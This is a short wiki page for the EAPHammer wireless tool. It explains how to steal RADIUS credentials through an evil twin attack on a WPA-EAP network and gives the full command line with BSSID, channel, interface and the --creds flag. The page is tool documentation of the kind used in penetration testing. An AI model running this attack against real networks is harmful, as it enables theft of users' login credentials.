Skip to content

II. Stealing RADIUS Credentials Using EAPHammer

Gabriel Ryan edited this page Sep 12, 2019 · 4 revisions

Note: you will need to generate a certificate in order to perform this attack. Please refer to I. x.509 Certificate Generation for instructions on how to do this.

To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the --creds flag as shown below.

./eaphammer --bssid 1C:7E:E5:97:79:B1 \
 --essid Example \
 --channel 2 \
 --interface wlan0 \
 --auth wpa-eap \
 --creds

EAPHammer Wiki

Clone this wiki locally